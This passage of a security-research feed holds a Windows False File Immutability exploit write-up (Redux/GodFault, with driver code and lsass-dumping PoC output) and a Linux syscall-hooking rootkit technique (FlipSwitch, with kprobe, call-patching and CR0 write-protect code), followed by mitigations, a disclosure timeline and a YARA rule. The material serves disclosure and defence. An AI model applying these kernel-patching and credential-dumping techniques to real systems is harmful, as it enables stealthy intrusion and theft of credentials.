00 ffffb90e`faa968e8 fffff800`5c2878d3     FLTMGR!FltWriteFileEx
01 ffffb90e`faa968f0 fffff800`5c2b2ccc     cldflt!HsmiRecallWriteFileNoLock+0x2df
02 ffffb90e`faa969f0 fffff800`5c2b25f8     cldflt!HsmRecallTransferData+0x25c
03 ffffb90e`faa96aa0 fffff800`5c2b35d7     cldflt!CldStreamTransferData+0x65c
04 ffffb90e`faa96bd0 fffff800`5c27196c     cldflt!CldiSyncTransferOrAckDataByObject+0x4c7
05 ffffb90e`faa96cb0 fffff800`5c2bb568     cldflt!CldiSyncTransferOrAckData+0xdc
06 ffffb90e`faa96d10 fffff800`5c2bafe1     cldflt!CldiPortProcessTransferData+0x46c
07 ffffb90e`faa96db0 fffff800`5c27895a     cldflt!CldiPortProcessTransfer+0x291
08 ffffb90e`faa96e50 fffff800`4259530a     cldflt!CldiPortNotifyMessage+0xd9a
09 ffffb90e`faa96f70 fffff800`425cf299     FLTMGR!FltpFilterMessage+0xda
0a ffffb90e`faa96fd0 fffff800`42597e60     FLTMGR!FltpMsgDispatch+0x179
0b ffffb90e`faa97040 fffff800`3eaebef5     FLTMGR!FltpDispatch+0xe0
0c ffffb90e`faa970a0 fffff800`3ef40060     nt!IofCallDriver+0x55
0d ffffb90e`faa970e0 fffff800`3ef41a90     nt!IopSynchronousServiceTail+0x1d0
0e ffffb90e`faa97190 fffff800`3ef41376     nt!IopXxxControlFile+0x700
0f ffffb90e`faa97380 fffff800`3ec2bbe8     nt!NtDeviceIoControlFile+0x56
10 ffffb90e`faa973f0 00007ffe`b074f454     nt!KiSystemServiceCopyEnd+0x28
11 000000dc`e7bff448 00007ffe`99383ca2     ntdll!NtDeviceIoControlFile+0x14
12 000000dc`e7bff450 00007ffe`99383251     FLTLIB!FilterpDeviceIoControl+0x136
13 000000dc`e7bff4c0 00007ffe`94f3b12b     FLTLIB!FilterSendMessage+0x31
14 000000dc`e7bff510 00007ffe`94f36059     cldapi!CfpExecuteTransferData+0x103
15 000000dc`e7bff690 00007ff7`ac9216e0     cldapi!CfExecute+0x349
16 000000dc`e7bff730 00000029`8969cee4     PPLFault!FetchDataCallback+0x4b0 [C:\git\PPLFault\PPLFault\PPLFault.cpp @ 176] 

</code></pre>
<p>Let’s see what kind of access was granted to the <code>FILE_OBJECT</code> (the kernel object backing a handle) passed as the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltwritefileex">second parameter</a> to <code>FltWriteFileEx</code>. On x64, this parameter arrives in <code>rdx</code>.</p>
<pre><code class="language-shell">0: kd&gt; dt _FILE_OBJECT @rdx ReadAccess WriteAccess DeleteAccess SharedRead SharedWrite SharedDelete Flags
ntdll!_FILE_OBJECT
   +0x04a ReadAccess   : 0 ''
   +0x04b WriteAccess  : 0 ''
   +0x04c DeleteAccess : 0 ''
   +0x04d SharedRead   : 0 ''
   +0x04e SharedWrite  : 0 ''
   +0x04f SharedDelete : 0x1 ''
   +0x050 Flags        : 0x4000a
0: kd&gt; !fileobj @rdx

Device Object: 0xffffa909953848f0   \Driver\volmgr
Vpb: 0xffffa90995352ee0
Event signalled
Access: SharedDelete 

Flags:  0x4000a
	Synchronous IO
	No Intermediate Buffering
	Handle Created

FsContext: 0xffffcf04ac4c6170	FsContext2: 0xffffcf04a7d1cad0
CurrentByteOffset: 0
Cache Data:
  Section Object Pointers: ffffa90999f44378
  Shared Cache Map: 00000000


File object extension is at ffffa9099a4c5f40:

	Flags:	00000001
		Ignore share access checks.
</code></pre>
<p>We can see the file wasn’t opened for write access, and “Ignore share access checks” sounds a lot like <code>IO_IGNORE_SHARE_ACCESS_CHECK</code>. Let’s sanity-check the <code>ByteOffset</code> and <code>Length</code> parameters, which are the third and fourth parameters to <code>FltWriteFileEx</code>, stored in <code>r8</code> and <code>r9</code> respectively.</p>
<pre><code>0: kd&gt; dx ((PLARGE_INTEGER)@r8)-&gt;QuadPart
((PLARGE_INTEGER)@r8)-&gt;QuadPart : 0 [Type: __int64]
0: kd&gt; dx (int)@r9
(int)@r9         : 90112 [Type: int]
</code></pre>
<p>A write of <code>90,112</code> bytes at offset <code>0</code> lines up with the ProcMon output. What about <code>Flags</code>, the sixth parameter?</p>
<pre><code>0: kd&gt; dx *(PULONG)(@rsp+(8*6))
*(PULONG)(@rsp+(8*6)) : 0xa [Type: unsigned long]
</code></pre>
<p><code>0xA</code> is <code>0x2 | 0x8</code>, which is <code>FLTFL_IO_OPERATION_PAGING</code> | <code>FLTFL_IO_OPERATION_SYNCHRONOUS_PAGING</code>. This lines up with the “Paging I/O, Synchronous Paging I/O” we saw in ProcMon.</p>
<p>Let’s see if we can reproduce this in a driver. We’re going to open a locally-mapped DLL like we did in ExperimentTwo, but instead of asking for <code>FILE_WRITE_DATA</code>, we’re going to stick to the same permissions as CloudFiles: <code>SYNCHRONIZE</code> | <code>FILE_READ_ATTRIBUTES</code> | <code>FILE_WRITE_ATTRIBUTES</code>. This won’t trip the <code>MmFlushImageSection</code> check which looks for <code>FILE_WRITE_DATA</code>, but we’ll throw in <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> anyway to more closely replicate CloudFiles’ behavior. Next, we’ll use <code>FltWriteFileEx</code> to perform a synchronous paging write to the non-writable <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_file_object">FILE_OBJECT</a>.</p>
<p>We’re omitting some helper code for brevity. All the example code in this article is available on our <a href="https://github.com/gabriellandau/BlogExamples/tree/main/Redux/FileTestDriver">GitHub</a>.</p>
<pre><code class="language-c">VOID ExperimentFour()
{
    DECLARE_CONST_UNICODE_STRING(filePath,
        L&quot;\\SystemRoot\\System32\\TestDll.dll&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES fileObjAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;
    PVOID pMappedBase = NULL;
    PFILE_OBJECT pFileObject = NULL;
    PFLT_INSTANCE pInstance = NULL;
    PFLT_VOLUME pVolume = NULL;
    LARGE_INTEGER byteOffset{};
    ULONG bytesWritten = 0;

    ntStatus = MapFileAsImageSection(
        &amp;filePath, &amp;hFile, &amp;hSection, &amp;pMappedBase);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour: MapFileAsImageSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    // Find our own minifilter instance for the volume containing this file
    // We'll need it later
    ntStatus = GetMyInstanceForFile(hFile, &amp;pVolume, &amp;pInstance);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour: GetMyInstanceForFile failed with NTSTATUS 0x%08x\n&quot;,
            ntStatus);
        goto Cleanup;
    }

    // Now that a view of the SEC_IMAGE mapping exists, 
    // close the file and section handles because that's what ntdll does
    // https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593
    HandleDelete(hFile);
    HandleDelete(hSection);

    InitializeObjectAttributes(&amp;fileObjAttr, 
        (PUNICODE_STRING)&amp;filePath, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // Open the file without FILE_WRITE_DATA
    // cldflt.sys!HsmiOpenFile uses this instead of IoCreateFileEx
    ntStatus = FltCreateFileEx2(
        gpFilter,
        NULL,
        &amp;hFile2,
        &amp;pFileObject,
        SYNCHRONIZE | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES,
        &amp;fileObjAttr, &amp;iosb, NULL, 0,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_NO_INTERMEDIATE_BUFFERING | FILE_SYNCHRONOUS_IO_NONALERT | 
        FILE_NON_DIRECTORY_FILE | FILE_OPEN_REPARSE_POINT,
        NULL, 0,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour: FltCreateFileEx2 failed with NTSTATUS 0x%08x\n&quot;,
            ntStatus);
        goto Cleanup;
    }

    // cldflt.sys is using FltWriteFileEx with synchronous paging I/O
    ntStatus = FltWriteFileEx(
        pInstance, pFileObject, &amp;byteOffset,
        sizeof(gZeroBuf), gZeroBuf,
        FLTFL_IO_OPERATION_PAGING | FLTFL_IO_OPERATION_SYNCHRONOUS_PAGING, 
        &amp;bytesWritten, NULL, NULL, NULL, NULL);

    // If FltWriteFileEx returns success without us passing FILE_WRITE_DATA, 
    // then we have succeeded
    bSuccessful = NT_SUCCESS(ntStatus) &amp;&amp; (sizeof(gZeroBuf) == bytesWritten);
    bReportResults = TRUE;
    
Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour complete. &quot;
            &quot;FltWriteFileEx %s be used to write to a non-writable FILE_OBJECT &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hSection);
    HandleDelete(hFile2);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }
    ReferenceDelete(pFileObject);
    if (pInstance) FltObjectDereference(pInstance);
    if (pVolume) FltObjectDereference(pVolume);
}
</code></pre>
<p>This experiment yields the following output:</p>
<pre><code class="language-c">ExperimentFour complete. FltWriteFileEx CAN be used to write to a non-writable FILE_OBJECT Status: 0x00000000
</code></pre>
<p>This proves that <code>FltWriteFileEx</code> can be used to break several rules. There’s a key difference between PPLFault and this experiment: The experiment succeeded without any network redirectors, proving that CloudFiles alone can modify in-use executables, regardless of whether they are mapped locally or via SMB. More abstractly, it proves that <em>FFI exploitation via CloudFiles may be possible without network redirectors</em>.</p>
<h2>A new exploit</h2>
<p><a href="https://x.com/GabrielLandau/status/1757818200127946922">Microsoft’s PPLFault mitigation</a> specifically targets executables loaded over network redirectors. Can we apply what we’ve discovered here to achieve the same effect sans network redirector?</p>
<p>When CI requests the DLL for signature verification, PPLFault uses <a href="https://github.com/gabriellandau/PPLFault/blob/c835f98faf596ab9f2ceb362b30a79a1b4808888/PPLFault/PPLFault.cpp#L132-L136"><code>CfExecute</code></a> to write to (rehydrate) the placeholder from its <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/ne-cfapi-cf_callback_type#constants">fetch data callback</a>. Once the original file has been served up for signature verification, it switches over to the payload, <a href="https://github.com/gabriellandau/PPLFault/blob/c835f98faf596ab9f2ceb362b30a79a1b4808888/PPLFault/PPLFault.cpp#L138-L187">calling CfExecute a second time</a> during the same callback to overwrite a portion of the file with a payload. When we tweaked PPLFault to have the victim load the DLL locally instead of over loopback SMB, however, the second call to <code>CfExecute</code> failed with “The cloud operation was canceled by user.” We needed another approach.</p>
<pre><code class="language-shell">C:\Users\user\Desktop&gt;PPLFault.exe 760 services.dmp
 [+] Ready. Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [!] CfExecute #2 failed with HR 0x8007018e: The cloud operation was canceled by user.
 [!] Did not find expected dump file: services.dmp
</code></pre>
<p>After some reverse engineering, we learned that the failure was due to checks within CloudFilter itself, not from its interactions with the I/O manager or filesystem. We discovered that calling <a href="https://learn.microsoft.com/en-us/previous-versions/mt827480(v=vs.85)"><code>CfDehydratePlaceholder</code></a> then calling <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/nf-cfapi-cfhydrateplaceholder"><code>CfHydratePlaceholder</code></a> from a different thread (outside of the rehydration callback) would reset the state of our file inside the CloudFilter driver, causing it to re-invoke our rehydration callback. This allowed us to overwrite the in-use DLL with our payload and achieve arbitrary code execution as WinTcb-Light. This small code change resurrected PPLFault, so we named the variant Redux.</p>
<p>We similarly resurrected <a href="https://github.com/gabriellandau/PPLFault?tab=readme-ov-file#godfault">GodFault</a>, leveraging our highly-privileged PPL access to compromise kernel memory and bypass Windows Defender’s process protections, terminating a normally-unkillable process.</p>
<p>You can find our PoCs for Redux and GodFault-Redux on <a href="https://github.com/gabriellandau/Redux">GitHub</a>.</p>
<p>The video below shows the following on fully-updated Windows Server 2022 (February 2026, version 20348.4773):</p>
<ol>
<li>PPLFault failing to dump <a href="https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service"><code>lsass</code></a></li>
<li>Redux successfully dumping <code>lsass</code></li>
<li>An administrator failing to terminate <code>MsMpEng.exe</code> because it is PPL</li>
<li>GodFault-Redux successfully terminating <code>MsMpEng.exe</code></li>
</ol>
<div class="youtube-video-container">
  <iframe src="https://www.youtube.com/embed/e5OYMXfx84E?si=P4jnGWs8QWo7AbY-&amp;vq=hd1080" title="YouTube video player" allow="fullscreen; accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h2>Mitigation</h2>
<p>In our report to MSRC, we provided a filesystem minifilter that mitigates Redux by blocking <code>IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION</code> operations meeting all of the following criteria:</p>
<ul>
<li>The requestor is a PPL.</li>
<li>The requestor's <code>PreviousMode</code> is <code>UserMode</code>.</li>
<li>The page protection is executable (e.g. <code>PAGE_EXECUTE_READ</code>) or the allocation attributes contain <code>SEC_IMAGE</code>.</li>
<li>The file has a <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c8e77b37-3909-4fe6-a4ea-2b9d423b1ee4">Cloud Filter reparse tag</a> such as <code>IO_REPARSE_TAG_CLOUD</code>.</li>
</ul>
<p>A mitigation is built into Elastic Defend versions 8.14 and newer. If your fleet runs any affected operating systems, you can enable it by setting the following in <a href="https://www.elastic.co/kr/docs/solutions/security/configure-elastic-defend/configure-an-integration-policy-for-elastic-defend#adv-policy-settings">Defend Advanced Policy</a>.</p>
<pre><code>windows.advanced.flags: e931849d52535955fcaa3847dd17947b
</code></pre>
<p>With this mitigation in place, the exploit is blocked:</p>
<pre><code class="language-shell">C:\Users\user\Desktop&gt;Redux 624 services.dmp
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [!] SpawnPPL: WaitForSingleObject returned 258.  Expected WAIT_OBJECT_0.  GLE: 2
 [!] Did not find expected dump file: services.dmp
</code></pre>
<p>Simultaneously, Windows displays a popup with the <code>STATUS_ACCESS_DENIED (0xC0000022)</code> status code.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image1.png" alt="A popup showing the mitigation blocking the Redux exploit." title="A popup showing the mitigation blocking the Redux exploit." /></p>
<p>You can find our PoC for the mitigation on <a href="https://github.com/gabriellandau/Redux/tree/main/NoFault">GitHub</a>.</p>
<h2>Disclosure and Remediation</h2>
<p>The disclosure timeline is as follows:</p>
<ul>
<li>2024-02-14 We reported Redux to MSRC.</li>
<li>2024-02-29 The Windows Defender team reached out to coordinate disclosure.</li>
<li>2024-10-01 Windows 11 24H2 reached GA with the mitigation.</li>
</ul>
<p>When we disclosed Redux to MSRC, it was functional against fully-patched versions of Windows 11, but not against the experimental Insider Canary build 25936. While discussing the issue with the Windows Defender team, we learned that (now former) Microsoft Senior Security Researcher <a href="https://x.com/PhilipTsukerman">Philip Tsukerman</a> had discovered it while looking for variants of PPLFault, with the fix still in pre-release testing.</p>
<p>The table below shows affected and fixed versions of Windows as of the date of publication.</p>
<table>
<thead>
<tr>
<th align="left">Operating System</th>
<th align="left">Lifecycle</th>
<th align="left">Fix Status</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Windows 11 24H2</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-11-home-and-pro">Mainstream Support</a></td>
<td align="left">✔ Fixed</td>
</tr>
<tr>
<td align="left">Windows 10 Enterprise LTSC 2021</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-10-enterprise-ltsc-2021">Mainstream Support</a></td>
<td align="left">❌ Still functional as of February 2026 (19044.6937)</td>
</tr>
<tr>
<td align="left">Windows Server 2025</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2025">Mainstream Support</a></td>
<td align="left">✔ Fixed</td>
</tr>
<tr>
<td align="left">Windows Server 2022</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2022">Mainstream Support</a></td>
<td align="left">❌ Still functional as of February 2026 (20348.4773)</td>
</tr>
<tr>
<td align="left">Windows Server 2019</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2019">Extended Support</a></td>
<td align="left">❌ Still functional as of February 2026 (17763.8389)</td>
</tr>
</tbody>
</table>
<h2>Conclusion</h2>
<p>In 2024, we disclosed a new Windows vulnerability class, False File Immutability (FFI), demonstrating it with the release of two distinct kernel exploits: <a href="https://github.com/gabriellandau/PPLFault">PPLFault</a> and <a href="https://github.com/gabriellandau/ItsNotASecurityBoundary">ItsNotASecurityBoundary</a>. Both exploits leverage network redirectors to exploit design flaws in Windows Code Integrity. In this research, we showcased and <a href="https://github.com/gabriellandau/Redux">released</a> another exploit which demonstrates how to exploit FFI without network redirectors. We believe that this was the third FFI exploit when it was reported in February 2024; there have since been at least <a href="https://project-zero.issues.chromium.org/issues/42451731">two</a> <a href="https://project-zero.issues.chromium.org/issues/42451731">more</a>.</p>
<p>Redux is not the end of FFI; there are more exploitable FFI vulnerabilities.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/immutable-illusion.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[FlipSwitch: a Novel Syscall Hooking Technique]]></title>
            <link>https://www.elastic.co/kr/security-labs/flipswitch-linux-rootkit</link>
            <guid>flipswitch-linux-rootkit</guid>
            <pubDate>Tue, 30 Sep 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[FlipSwitch offers a fresh look at bypassing Linux kernel defenses, revealing a new technique in the ongoing battle between cyber attackers and defenders.]]></description>
            <content:encoded><![CDATA[<h2>FlipSwitch: a Novel Syscall Hooking Technique</h2>
<p>Syscall hooking, particularly by overwriting pointers to syscall handlers, has been a cornerstone of Linux rootkits like Diamorphine and PUMAKIT, enabling them to hide their presence and control the flow of information. While other hooking mechanisms exist, such as ftrace and eBPF, each has its own pros and cons, and most have some form of limitation. Function pointer overwrites remain the most effective and simple way of hooking syscalls in the kernel.</p>
<p>However, the Linux kernel is a moving target. With each new release, the community introduces changes that can render entire classes of malware obsolete overnight. This is precisely what happened with the release of <a href="https://github.com/torvalds/linux/blob/v6.9/arch/x86/entry/syscall_64.c"><strong>Linux kernel 6.9</strong></a>, which introduced a fundamental change to the syscall dispatch mechanism for x86-64 architecture, effectively neutralizing traditional syscall hooking methods.</p>
<h3>The Walls Are Closing In: The Death of a Classic Hooking Technique</h3>
<p>To appreciate the significance of the changes in kernel 6.9, let's first revisit the classic method of syscall hooking. For years, the kernel used a simple array of function pointers called the <code>sys_call_table</code> to dispatch syscalls. The logic was beautifully simple, as seen in the kernel source:</p>
<pre><code class="language-c">// Pre-6.9: Direct array lookup
sys_call_table[__NR_kill](regs);
</code></pre>
<p>A rootkit could locate this table in memory, disable write protection, and overwrite the address of a syscall like <code>kill</code> or <code>getdents64</code> with a pointer to its own adversary-controlled function. This empowers a rootkit to filter the output of the <code>ls</code> command to hide malicious files or prevent a specific process from being terminated, for example. But the directness of this mechanism was also its weakness. With Linux kernel 6.9, the game changed completely when the direct array lookup was replaced with a more efficient and secure switch statement-based dispatch mechanism:</p>
<pre><code class="language-c">// Kernel 6.9+: Switch-statement dispatch
long x64_sys_call(const struct pt_regs *regs, unsigned int nr)
{
    switch (nr) {
    #include &lt;asm/syscalls_64.h&gt; // Expands to case statements
    default: return __x64_sys_ni_syscall(regs);
    }
}
</code></pre>
<p>This change, while seemingly subtle, was a death blow to traditional syscall hooking. The <code>sys_call_table</code> still exists for compatibility with tracing tools, but it is no longer used for the actual dispatch of syscalls. Any modifications to it are simply ignored.</p>
<h3>Finding a New Way In: The FlipSwitch Technique</h3>
<p>We knew that the kernel still had to call the original syscall functions <em>somehow</em>. The logic was still there, just hidden behind a new layer of indirection. This led to the development of <a href="https://github.com/1337-42/FlipSwitch-dev/">FlipSwitch</a>, a technique that bypasses the new switch statement implementation by directly patching the compiled machine code of the kernel's syscall dispatcher.</p>
<p>Here's a breakdown of how it works:</p>
<p>The first step is to find the address of the original syscall function we want to hook. Ironically, the now-defunct <code>sys_call_table</code> is the perfect tool for this. We can still look up the address of <code>sys_kill</code> in this table to get a reliable pointer to the original function.</p>
<p>A common method to locate kernel symbols is the <code>kallsyms_lookup_name</code> function. This function provides a programmatic way to find the address of any exported kernel symbol by its name. For instance, we can use <code>kallsyms_lookup_name(&quot;sys_kill&quot;)</code> to obtain the address of the <code>sys_kill</code> function, providing a flexible and reliable way to obtain function pointers even when the <code>sys_call_table</code> is not directly usable for dispatch.</p>
<p>It's important to note that <code>kallsyms_lookup_name</code> is generally not exported by default, meaning it's not directly accessible to loadable kernel modules. This restriction enhances kernel security. However, a common technique to indirectly access <code>kallsyms_lookup_name</code> is by using a <code>kprobe</code>. By placing a <code>kprobe</code> on a known kernel function, a module can then use the kprobe's internal structure to derive the address of the original, probed function. From this, a function pointer to <code>kallsyms_lookup_name</code> can often be obtained through careful analysis of the kernel's memory layout, such as by examining nearby memory regions relative to the probed function's address.</p>
<pre><code class="language-c">/**
 * Find the address of kallsyms_lookup_name using kprobes
 * @return Pointer to kallsyms_lookup_name function or NULL on failure
 */
void *find_kallsyms_lookup_name(void)
{
    struct kprobe *kp;
    void *addr;

    kp = kzalloc(sizeof(*kp), GFP_KERNEL);
    if (!kp)
        return NULL;

    kp-&gt;symbol_name = O_STRING(&quot;kallsyms_lookup_name&quot;);
    if (register_kprobe(kp) != 0) {
        kfree(kp);
        return NULL;
    }

    addr = kp-&gt;addr;
    unregister_kprobe(kp);
    kfree(kp);

    return addr;
}
</code></pre>
<p>After finding the address of <code>kallsyms_lookup_name</code>, we can use it to find pointers to the symbols that we need to continue the process of placing a hook.</p>
<p>With the target address in hand, we then turn our attention to the <code>x64_sys_call</code> function, the new home of the syscall dispatch logic. We begin to scan its raw machine code, byte by byte, looking for a call instruction. On x86-64, the call instruction has a specific one-byte opcode: <code>0xe8</code>. This byte is followed by a 4-byte relative offset that tells the CPU where to jump to.</p>
<p>This is where the magic happens. We're not just looking for <em>any</em> call instruction. We're looking for a call instruction that, when combined with its 4-byte offset, points directly to the address of the original <code>sys_kill</code> function we found previously. This combination of the <code>0xe8</code> opcode and the specific offset is a unique signature within the <code>x64_sys_call</code> function. There is only one instruction that matches this pattern.</p>
<pre><code class="language-c">/* Search for call instruction to sys_kill in x64_sys_call */
    for (size_t i = 0; i &lt; DUMP_SIZE - 4; ++i) {
        if (func_ptr[i] == 0xe8) { /* Found a call instruction */
            int32_t rel = *(int32_t *)(func_ptr + i + 1);
            void *call_addr = (void *)((uintptr_t)x64_sys_call + i + 5 + rel);
            
            if (call_addr == (void *)sys_call_table[__NR_kill]) {
                debug_printk(&quot;Found call to sys_kill at offset %zu\n&quot;, i);
</code></pre>
<p>Once we've located this unique instruction, we've found our insertion point. But before we can modify the kernel's code, we must bypass its memory protections. Since we are already executing within the kernel (ring 0), we can use a classic, powerful technique: disabling write protection by flipping a bit in the <code>CR0</code> register. The <code>CR0</code> register controls basic processor functions, and its 16th bit (Write Protect) prevents the CPU from writing to read-only pages. By temporarily clearing this bit, we permit ourselves to modify any part of the kernel's memory.</p>
<pre><code class="language-c">/**
 * Force write to CR0 register bypassing compiler optimizations
 * @param val Value to write to CR0
 */
static inline void write_cr0_forced(unsigned long val)
{
    unsigned long order;

    asm volatile(&quot;mov %0, %%cr0&quot; 
        : &quot;+r&quot;(val), &quot;+m&quot;(order));
}

/**
 * Enable write protection (set WP bit in CR0)
 */
static inline void enable_write_protection(void)
{
    unsigned long cr0 = read_cr0();
    set_bit(16, &amp;cr0);
    write_cr0_forced(cr0);
}

/**
 * Disable write protection (clear WP bit in CR0)
 */
static inline void disable_write_protection(void)
{
    unsigned long cr0 = read_cr0();
    clear_bit(16, &amp;cr0);
    write_cr0_forced(cr0);
}

</code></pre>
<p>With write protection disabled, we overwrite the 4-byte offset of the call instruction with a new offset that points to our own <code>fake_kill</code> function. We have, in effect, &quot;flipped the switch&quot; inside the kernel's own dispatcher, redirecting a single syscall to our malicious code while leaving the rest of the system untouched.</p>
<p>This technique is both precise and reliable. And, significantly, all changes are fully reverted when the kernel module is unloaded, leaving no trace of its presence.</p>
<p>The development of FlipSwitch is a testament to the ongoing cat-and-mouse game between attackers and defenders. As kernel developers continue to harden the Linux kernel, attackers will continue to find new and creative ways to bypass these defenses. We hope that by sharing this research, we can help the security community stay one step ahead.</p>
<h2>Detecting malware</h2>
<p>Detecting rootkits once they have been loaded into the kernel is exceptionally difficult, as they are designed to operate stealthily and evade detection by security tools. However, we have developed a YARA signature to identify the proof-of-concept for FlipSwitch. This signature can be used to detect the presence of the FlipSwitch rootkit in memory or on disk.</p>
<h3>YARA</h3>
<p>Elastic Security has created a YARA rule to identify this activity. Below is the rule for the FlipSwitch proof of concept.</p>
<pre><code>rule Linux_Rootkit_Flipswitch_821f3c9e
{
	meta:
		author = &quot;Elastic Security&quot;
		description = &quot;Yara rule to detect the FlipSwitch rootkit PoC&quot;
		os = &quot;Linux&quot;
		arch = &quot;x86&quot;
		category_type = &quot;Rootkit&quot;
		family = &quot;Flipswitch&quot;
		threat_name = &quot;Linux.Rootkit.Flipswitch&quot;
		
	strings:
		$all_a = { FF FF 48 89 45 E8 F0 80 ?? ?? ?? 31 C0 48 89 45 F0 48 8B 45 E8 0F 22 C0 }
		$obf_b = { BA AA 00 00 00 BE 0D 00 00 00 48 C7 ?? ?? ?? ?? ?? 49 89 C4 E8 }
		$obf_c = { BA AA 00 00 00 BE 15 00 00 00 48 89 C3 E8 ?? ?? ?? ?? 48 89 DF 48 89 43 30 E8 ?? ?? ?? ?? 85 C0 74 0D 48 89 DF E8 }
		$main_b = { 41 54 53 E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 49 89 C4 E8 ?? ?? ?? ?? 4D 85 E4 74 2D 48 89 C3 48 85 }
		$main_c = { 48 85 C0 74 1F 48 C7 ?? ?? ?? ?? ?? ?? 48 89 C7 48 89 C3 E8 ?? ?? ?? ?? 85 C0 74 0D 48 89 DF E8 ?? ?? ?? ?? 45 31 E4 EB 14 }
		$debug_b = { 48 89 E5 41 54 53 48 85 C0 0F 84 ?? ?? 00 00 48 C7 }
		$debug_c = { 48 85 C0 74 45 48 C7 ?? ?? ?? ?? ?? ?? 48 89 C7 48 89 C3 E8 ?? ?? ?? ?? 85 C0 75 26 48 89 DF 4C 8B 63 28 E8 ?? ?? ?? ?? 48 89 DF E8 }

	condition:
		#all_a&gt;=2 and (1 of ($obf_*) or 1 of ($main_*) or 1 of ($debug_*))
}

</code></pre>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://github.com/1337-42/FlipSwitch-dev/">https://github.com/1337-42/FlipSwitch-dev/</a></li>
<li><a href="https://www.virusbulletin.com/conference/vb2025/abstracts/unmasking-unseen-deep-dive-modern-linux-rootkits-and-their-detection/">https://www.virusbulletin.com/conference/vb2025/abstracts/unmasking-unseen-deep-dive-modern-linux-rootkits-and-their-detection/</a></li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/flipswitch-linux-rootkit/Security Labs Images 5.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Investigating a Mysteriously Malformed Authenticode Signature]]></title>
            <link>https://www.elastic.co/kr/security-labs/malformed-authenticode-signature</link>
            <guid>malformed-authenticode-signature</guid>
            <pubDate>Thu, 04 Sep 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[An in-depth investigation tracing a Windows Authenticode validation failure from vague error codes to undocumented kernel routines.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs recently encountered a signature validation issue with one of our Windows binaries. The executable was signed using <code>signtool.exe</code> as part of our standard continuous integration (CI) process, but on this occasion, the output file failed signature validation with the following error message:</p>
<blockquote>
<p>The digital signature of the object is malformed. For technical detail, see security bulletin MS13-098.</p>
</blockquote>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/image2.png" alt="MS13-098 error" title="MS13-098 error" /></p>
<p>The <a href="https://learn.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-098">documentation for MS13-098</a> is vague, but it describes a potential vulnerability related to malformed Authenticode signatures. Nothing obvious had changed on our end that might explain this new error, so we needed to investigate the cause and resolve the issue.</p>
<p>While we identified that this issue was affecting one of our signed Windows binaries, it could impact any binary. We are publishing this research as a reference for anyone else who may encounter the same problem in the future.</p>
<h2>Diagnosis</h2>
